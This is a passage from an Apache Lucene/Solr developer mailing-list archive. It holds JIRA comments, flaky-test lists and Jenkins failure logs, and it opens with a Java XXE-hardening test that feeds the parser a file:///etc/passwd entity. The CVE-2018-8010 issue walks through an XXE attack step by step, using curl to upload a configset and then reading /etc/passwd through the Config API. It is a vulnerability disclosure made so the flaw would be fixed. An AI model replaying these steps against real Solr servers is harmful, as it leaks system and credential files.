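    static DocumentBuilderFactory secureFactory() throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    public static void main(String[] args) throws Exception {
        String evil = "<!DOCTYPE config [<!ENTITY x SYSTEM \"file:///etc/passwd\">]>"
                + "<config>&x;</config>";
        try {
            secureFactory().newDocumentBuilder()
                    .parse(new ByteArrayInputStream(evil.getBytes(StandardCharsets.UTF_8)));
            System.out.println("parsed (XXE not blocked)");
        } catch (SAXParseException e) {
            // Expected: the parser refuses the document at the DOCTYPE.
            System.out.println("DOCTYPE rejected");
        }
    }
}
```

With the default JDK parser this prints that the DOCTYPE was rejected, so the file content never reaches the config.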

[jira] [Commented] (SOLR-9480) Graph Traversal for Significantly Related Terms (Semantic Knowledge Graph)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-9480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482620#comment-16482620
 ] 

ASF subversion and git services commented on SOLR-9480:
---

Commit 669b9e7a5343c625e265a075c9dbf24fcbff7363 in lucene-solr's branch 
refs/heads/master from Chris Hostetter
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=669b9e7 ]

SOLR-9480: A new 'relatedness()' aggregate function for JSON Faceting to enable 
building Semantic Knowledge Graphs


> Graph Traversal for Significantly Related Terms (Semantic Knowledge Graph)
> --
>
> Key: SOLR-9480
> URL: https://issues.apache.org/jira/browse/SOLR-9480
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: Trey Grainger
>Assignee: Hoss Man
>Priority: Major
> Attachments: SOLR-9480.patch, SOLR-9480.patch, SOLR-9480.patch, 
> SOLR-9480.patch, SOLR-9480.patch, SOLR-9480.patch
>
>
> This issue is to track the contribution of the Semantic Knowledge Graph Solr 
> Plugin (request handler), which exposes a graph-like interface for 
> discovering and traversing significant relationships between entities within 
> an inverted index.
> This data model has been described in the following research paper: [The 
> Semantic Knowledge Graph: A compact, auto-generated model for real-time 
> traversal and ranking of any relationship within a 
> domain|https://arxiv.org/abs/1609.00464], as well as in presentations I gave 
> in October 2015 at [Lucene/Solr 
> Revolution|http://www.slideshare.net/treygrainger/leveraging-lucenesolr-as-a-knowledge-graph-and-intent-engine]
>  and November 2015 at the [Bay Area Search 
> Meetup|http://www.treygrainger.com/posts/presentations/searching-on-intent-knowledge-graphs-personalization-and-contextual-disambiguation/].
> The source code for this project is currently available at 
> [https://github.com/careerbuilder/semantic-knowledge-graph], and the folks at 
> CareerBuilder (where this was built) have given me the go-ahead to now 
> contribute this back to the Apache Solr Project, as well.
> Check out the Github repository, research paper, or presentations for a more 
> detailed description of this contribution. Initial patch coming soon.






[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482613#comment-16482613
 ] 

Uwe Schindler commented on SOLR-12316:
--

[~noble.paul]: This bug fixes the check in the Config file parser.

> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: config-api, Schema and Analysis, Server
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
>  Labels: security
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>

[jira] [Commented] (LUCENE-8273) Add a ConditionalTokenFilter

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8273?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482583#comment-16482583
 ] 

ASF subversion and git services commented on LUCENE-8273:
-

Commit 0c0fce3e98c9a01c330329eca5153fb78c7decaf in lucene-solr's branch 
refs/heads/master from [~romseygeek]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=0c0fce3 ]

LUCENE-8273: TestRandomChains found some more end() handling problems


> Add a ConditionalTokenFilter
> 
>
> Key: LUCENE-8273
> URL: https://issues.apache.org/jira/browse/LUCENE-8273
> Project: Lucene - Core
>  Issue Type: New Feature
>Reporter: Alan Woodward
>Assignee: Alan Woodward
>Priority: Major
> Fix For: 7.4
>
> Attachments: LUCENE-8273-2.patch, LUCENE-8273-2.patch, 
> LUCENE-8273-part2-rebased.patch, LUCENE-8273-part2-rebased.patch, 
> LUCENE-8273-part2.patch, LUCENE-8273-part2.patch, LUCENE-8273.patch, 
> LUCENE-8273.patch, LUCENE-8273.patch, LUCENE-8273.patch, LUCENE-8273.patch, 
> LUCENE-8273.patch, LUCENE-8273.patch, LUCENE-8273.patch
>
>
> Spinoff of LUCENE-8265.  It would be useful to be able to wrap a TokenFilter 
> in such a way that it could optionally be bypassed based on the current state 
> of the TokenStream.  This could be used to, for example, only apply 
> WordDelimiterFilter to terms that contain hyphens.
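The idea can be illustrated with a plain-Java sketch. This is not the Lucene TokenStream API; the class and method names are made up for illustration: run a filter only on tokens that satisfy a condition, and let every other token pass through untouched.

```java
import java.util.List;
import java.util.function.Function;
import java.util.function.Predicate;
import java.util.stream.Collectors;

// Illustration of a "conditional" filter: apply the wrapped transform only
// when the condition holds, otherwise bypass it. (Hypothetical names; the
// real ConditionalTokenFilter works on incremental TokenStreams.)
public class ConditionalFilterSketch {

    static List<String> applyConditionally(List<String> tokens,
                                           Predicate<String> condition,
                                           Function<String, String> filter) {
        return tokens.stream()
                .map(t -> condition.test(t) ? filter.apply(t) : t)
                .collect(Collectors.toList());
    }

    public static void main(String[] args) {
        // Stand-in for "only apply WordDelimiterFilter to hyphenated terms".
        List<String> out = applyConditionally(
                List.of("wi-fi", "router", "plug-in"),
                t -> t.contains("-"),
                t -> t.replace("-", " "));
        System.out.println(out); // prints "[wi fi, router, plug in]"
    }
}
```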






[jira] [Commented] (LUCENE-8273) Add a ConditionalTokenFilter

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8273?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482582#comment-16482582
 ] 

ASF subversion and git services commented on LUCENE-8273:
-

Commit a69321a4d05d30f06248d0a33a237d8978942a9f in lucene-solr's branch 
refs/heads/branch_7x from [~romseygeek]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=a69321a ]

LUCENE-8273: TestRandomChains found some more end() handling problems


> Add a ConditionalTokenFilter
> 
>
> Key: LUCENE-8273
> URL: https://issues.apache.org/jira/browse/LUCENE-8273
> Project: Lucene - Core
>  Issue Type: New Feature
>Reporter: Alan Woodward
>Assignee: Alan Woodward
>Priority: Major
> Fix For: 7.4
>
> Attachments: LUCENE-8273-2.patch, LUCENE-8273-2.patch, 
> LUCENE-8273-part2-rebased.patch, LUCENE-8273-part2-rebased.patch, 
> LUCENE-8273-part2.patch, LUCENE-8273-part2.patch, LUCENE-8273.patch, 
> LUCENE-8273.patch, LUCENE-8273.patch, LUCENE-8273.patch, LUCENE-8273.patch, 
> LUCENE-8273.patch, LUCENE-8273.patch, LUCENE-8273.patch
>
>
> Spinoff of LUCENE-8265.  It would be useful to be able to wrap a TokenFilter 
> in such a way that it could optionally be bypassed based on the current state 
> of the TokenStream.  This could be used to, for example, only apply 
> WordDelimiterFilter to terms that contain hyphens.






BadApple candidates

2018-05-21 Thread Erick Erickson
I'm going to change how I collect the BadApple candidates. After getting a
little overwhelmed by the number of failure e-mails (even ignoring the ones
with BadApple enabled), "It come to me in a vision! In a flash!" (points if
you know where that comes from; hint: old music involving a pickle).

Since I collect failures for a week and then filter them by what's also in
Hoss's results from two weeks ago, that's really equivalent to creating the
candidate list from the intersection of the most recent week of Hoss's
results and the results from _three_ weeks ago. Much faster, too. Thanks Hoss!

So that's what I'll do going forward.

Meanwhile, here's the list for this Thursday.

BadApple candidates: I'll BadApple these on Thursday unless there are objections
   org.apache.lucene.search.TestLRUQueryCache.testBulkScorerLocking
   org.apache.solr.TestDistributedSearch.test
   org.apache.solr.cloud.AddReplicaTest.test
   org.apache.solr.cloud.AssignBackwardCompatibilityTest.test
   org.apache.solr.cloud.CreateRoutedAliasTest.testCollectionNamesMustBeAbsent
   org.apache.solr.cloud.CreateRoutedAliasTest.testTimezoneAbsoluteDate
   org.apache.solr.cloud.CreateRoutedAliasTest.testV1
   org.apache.solr.cloud.CreateRoutedAliasTest.testV2
   org.apache.solr.cloud.DeleteReplicaTest.raceConditionOnDeleteAndRegisterReplica
   org.apache.solr.cloud.LIRRollingUpdatesTest.testNewReplicaOldLeader
   org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.basicTest
   org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.testMostInSyncReplicasCanWinElection
   org.apache.solr.cloud.MoveReplicaHDFSTest.testFailedMove
   org.apache.solr.cloud.RestartWhileUpdatingTest.test
   org.apache.solr.cloud.TestCloudConsistency.testOutOfSyncReplicasCannotBecomeLeader
   org.apache.solr.cloud.TestPullReplica.testCreateDelete
   org.apache.solr.cloud.TestPullReplica.testKillLeader
   org.apache.solr.cloud.TestSolrCloudWithKerberosAlt.testBasics
   org.apache.solr.cloud.UnloadDistributedZkTest.test
   org.apache.solr.cloud.api.collections.CollectionsAPIAsyncDistributedZkTest.testAsyncRequests
   org.apache.solr.cloud.api.collections.CustomCollectionTest.testCustomCollectionsAPI
   org.apache.solr.cloud.autoscaling.ComputePlanActionTest.testNodeLost
   org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testMergeIntegration
   org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration
   org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger
   org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState
   org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testBelowSearchRate
   org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode
   org.apache.solr.cloud.autoscaling.SearchRateTriggerTest.testTrigger
   org.apache.solr.cloud.hdfs.HdfsUnloadDistributedZkTest.test
   org.apache.solr.cloud.hdfs.StressHdfsTest.test
   org.apache.solr.handler.TestSQLHandler.doTest
   org.apache.solr.security.BasicAuthIntegrationTest.testBasicAuth
   org.apache.solr.uninverting.TestDocTermOrds.testTriggerUnInvertLimit
   org.apache.solr.update.TestHdfsUpdateLog.testFSThreadSafety
   org.apache.solr.update.TestInPlaceUpdatesDistrib.test


Number of AwaitsFix: 21   Number of BadApples: 99

AwaitsFix Annotations:


Lucene AwaitsFix
GeoPolygonTest.java
   testLUCENE8276_case3()
   //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8276")

GeoPolygonTest.java
   testLUCENE8280()
   //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8280")

GeoPolygonTest.java
   testLUCENE8281()
   //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281")

RandomGeoPolygonTest.java
   testCompareBigPolygons()
   //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281")

RandomGeoPolygonTest.java
   testCompareSmallPolygons()
   //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281")

TestControlledRealTimeReopenThread.java
   testCRTReopen()
   @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-5737")

TestICUNormalizer2CharFilter.java
   testRandomStrings()
   @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-5595")

TestICUTokenizerCJK.java
   TestICUTokenizerCJK suite
   @AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8222")

TestMoreLikeThis.java
   testMultiFieldShouldReturnPerFieldBooleanQuery()
   @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-7161")

UIMABaseAnalyzerTest.java
   testRandomStrings()
   @Test @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-3869")

UIMABaseAnalyzerTest.java
   testRandomStringsWithConfigurationParameters()
   @Test @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-3869")

UIMATypeAwareAnalyzerTest.java
   testRandomStrings()
   @Test @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-3869")


Solr AwaitsFix
ReplaceNodeNoTarget

[jira] [Commented] (SOLR-12377) Overseer leak failure in TestLeaderElectionZkExpiry

2018-05-21 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12377?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482563#comment-16482563
 ] 

Mark Miller commented on SOLR-12377:


Looks okay to me.

> Overseer leak failure in TestLeaderElectionZkExpiry 
> 
>
> Key: SOLR-12377
> URL: https://issues.apache.org/jira/browse/SOLR-12377
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: SolrCloud
>Reporter: Mikhail Khludnev
>Assignee: Mikhail Khludnev
>Priority: Major
> Attachments: SOLR-12377.patch, SOLR-12377.patch, 
> TestLeaderElectionZkExpiry-Overseer-leak.log
>
>
> After SOLR-12200 is done, I checked {{TestLeaderElectionZkExpiry}}, which is 
> BadApple'd now. It yields the same Overseer leakage failure. Attaching a 
> simple fix, after which it beasts fine.
> {code}
> $ ant beast -Dbeast.iters=100 -Dtestcase=TestLeaderElectionZkExpiry 
> -Dtests.dups=3
> ...
>   [beaster] Beast round: 100
>   ..
>   [beaster] Beasting finished.
> -check-totals:
> beast:
> BUILD SUCCESSFUL
> {code} 






[JENKINS] Lucene-Solr-Tests-master - Build # 2539 - Still Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-Tests-master/2539/

3 tests failed.
FAILED:  org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState

Error Message:
Did not expect the processor to fire on first run! event={   
"id":"607d3cc2c6345dT7jtpv4rq0cqe2on812a27fpae",   
"source":"node_added_trigger",   "eventTime":27159297683502173,   
"eventType":"NODEADDED",   "properties":{ "eventTimes":[27159297683502173], 
"nodeNames":["127.0.0.1:39659_solr"]}}

Stack Trace:
java.lang.AssertionError: Did not expect the processor to fire on first run! 
event={
  "id":"607d3cc2c6345dT7jtpv4rq0cqe2on812a27fpae",
  "source":"node_added_trigger",
  "eventTime":27159297683502173,
  "eventType":"NODEADDED",
  "properties":{
"eventTimes":[27159297683502173],
"nodeNames":["127.0.0.1:39659_solr"]}}
at 
__randomizedtesting.SeedInfo.seed([860FB951B6B7BD4C:48A11DC24E8EC55A]:0)
at org.junit.Assert.fail(Assert.java:93)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.lambda$new$0(NodeAddedTriggerTest.java:49)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTrigger.run(NodeAddedTrigger.java:161)
at 
org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState(NodeAddedTriggerTest.java:257)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
or

[JENKINS] Lucene-Solr-7.x-MacOSX (64bit/jdk1.8.0) - Build # 658 - Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-7.x-MacOSX/658/
Java: 64bit/jdk1.8.0 -XX:+UseCompressedOops -XX:+UseG1GC

5 tests failed.
FAILED:  
org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration

Error Message:
last state: 
DocCollection(testSplitIntegration_collection//clusterstate.json/39)={   
"replicationFactor":"2",   "pullReplicas":"0",   
"router":{"name":"compositeId"},   "maxShardsPerNode":"2",   
"autoAddReplicas":"false",   "nrtReplicas":"2",   "tlogReplicas":"0",   
"autoCreated":"true",   "shards":{ "shard2":{   "replicas":{ 
"core_node3":{   
"core":"testSplitIntegration_collection_shard2_replica_n3",   
"leader":"true",   "SEARCHER.searcher.maxDoc":11,   
"SEARCHER.searcher.deletedDocs":0,   "INDEX.sizeInBytes":1,   
"node_name":"127.0.0.1:1_solr",   "state":"active",   
"type":"NRT",   "SEARCHER.searcher.numDocs":11}, "core_node4":{ 
  "core":"testSplitIntegration_collection_shard2_replica_n4",   
"SEARCHER.searcher.maxDoc":11,   "SEARCHER.searcher.deletedDocs":0, 
  "INDEX.sizeInBytes":1,   "node_name":"127.0.0.1:10001_solr",  
 "state":"active",   "type":"NRT",   
"SEARCHER.searcher.numDocs":11}},   "range":"0-7fff",   
"state":"active"}, "shard1":{   "stateTimestamp":"1526912528747245150", 
  "replicas":{ "core_node1":{   
"core":"testSplitIntegration_collection_shard1_replica_n1",   
"leader":"true",   "SEARCHER.searcher.maxDoc":14,   
"SEARCHER.searcher.deletedDocs":0,   "INDEX.sizeInBytes":1,   
"node_name":"127.0.0.1:1_solr",   "state":"active",   
"type":"NRT",   "SEARCHER.searcher.numDocs":14}, "core_node2":{ 
  "core":"testSplitIntegration_collection_shard1_replica_n2",   
"SEARCHER.searcher.maxDoc":14,   "SEARCHER.searcher.deletedDocs":0, 
  "INDEX.sizeInBytes":1,   "node_name":"127.0.0.1:10001_solr",  
 "state":"active",   "type":"NRT",   
"SEARCHER.searcher.numDocs":14}},   "range":"8000-",   
"state":"inactive"}, "shard1_1":{   "parent":"shard1",   
"stateTimestamp":"1526912528767921700",   "range":"c000-",  
 "state":"active",   "replicas":{ "core_node10":{   
"leader":"true",   
"core":"testSplitIntegration_collection_shard1_1_replica1",   
"SEARCHER.searcher.maxDoc":7,   "SEARCHER.searcher.deletedDocs":0,  
 "INDEX.sizeInBytes":1,   "node_name":"127.0.0.1:1_solr",   
"base_url":"http://127.0.0.1:1/solr";,   "state":"active",   
"type":"NRT",   "SEARCHER.searcher.numDocs":7}, 
"core_node9":{   
"core":"testSplitIntegration_collection_shard1_1_replica0",   
"SEARCHER.searcher.maxDoc":7,   "SEARCHER.searcher.deletedDocs":0,  
 "INDEX.sizeInBytes":1,   "node_name":"127.0.0.1:10001_solr",   
"base_url":"http://127.0.0.1:10001/solr";,   "state":"active",   
"type":"NRT",   "SEARCHER.searcher.numDocs":7}}}, "shard1_0":{  
 "parent":"shard1",   "stateTimestamp":"1526912528767525050",   
"range":"8000-bfff",   "state":"active",   "replicas":{ 
"core_node7":{   "leader":"true",   
"core":"testSplitIntegration_collection_shard1_0_replica0",   
"SEARCHER.searcher.maxDoc":7,   "SEARCHER.searcher.deletedDocs":0,  
 "INDEX.sizeInBytes":1,   "node_name":"127.0.0.1:10001_solr",   
"base_url":"http://127.0.0.1:10001/solr";,   "state":"active",   
"type":"NRT",   "SEARCHER.searcher.numDocs":7}, 
"core_node8":{   
"core":"testSplitIntegration_collection_shard1_0_replica1",   
"SEARCHER.searcher.maxDoc":7,   "SEARCHER.searcher.deletedDocs":0,  
 "INDEX.sizeInBytes":1,   "node_name":"127.0.0.1:1_solr",   
"base_url":"http://127.0.0.1:1/solr";,   "state":"active",   
"type":"NRT",   "SEARCHER.searcher.numDocs":7}

Stack Trace:
java.util.concurrent.TimeoutException: last state: 
DocCollection(testSplitIntegration_collection//clusterstate.json/39)={
  "replicationFactor":"2",
  "pullReplicas":"0",
  "router":{"name":"compositeId"},
  "maxShardsPerNode":"2",
  "autoAddReplicas":"false",
  "nrtReplicas":"2",
  "tlogReplicas":"0",
  "autoCreated":"true",
  "shards":{
"shard2":{
  "replicas":{
"core_node3":{
  "core":"testSplitIntegration_collection_shard2_replica_n3",
  "leader":"true",
  "SEARCHER.searcher.maxDoc":11,
  "SEARCHER.searcher.deletedDocs":0,
  "INDEX.sizeInBytes":1,
  "node_name":"127.0.0.1:1_solr",
  "state"

[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread Noble Paul (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482538#comment-16482538
 ] 

Noble Paul commented on SOLR-12316:
---

[~ichattopadhyaya]

 

Just to clarify. Didn't we disable resolving external file reference if the 
configset is loaded using the REST API ?

> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: config-api, Schema and Analysis, Server
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
>  Labels: security
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> 
>   
>   
> 
> {code}
> solrconfig.xml
> {code}
> 
>  
> ]>
> 
>   ${solr.data.dir:}
>
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   
>   7.3.0
>   
> 
>   ${solr.commitwithin.softcommit:true}
> 
>   
>   
> 
>   explicit
>   true
>   text
>   &passwdFile;
> 
>   
> 
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
>   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
>                                  Dload  Upload   Total   Spent    Left  Speed
> 100  7939  100  7939    0     0   7939      0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind
>  Daemon:/var/lib/rpcb
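The quoted configs above were partly eaten by the mail archiver, but the mechanism is plain DTD entity substitution: an entity declared in the document's DTD is expanded wherever it is referenced, and the XXE payload simply declares its entity with SYSTEM "file:///etc/passwd" so the parser splices in the file. A stdlib-only Python sketch of the benign (internal-entity) half of that mechanism — illustrative, not the Solr code:

```python
import xml.etree.ElementTree as ET

# An entity declared in the internal DTD subset is expanded by the parser
# wherever "&greeting;" appears -- the same substitution that puts the
# contents of &passwdFile; into the handler's "defaults" above. With a
# SYSTEM entity, a parser configured to resolve external entities would
# splice in the referenced file's contents instead of a literal string.
doc = """<!DOCTYPE config [
  <!ENTITY greeting "hello">
]>
<config><str name="password">&greeting;</str></config>"""

root = ET.fromstring(doc)
assert root.find("str").text == "hello"  # entity expanded by the parser
```

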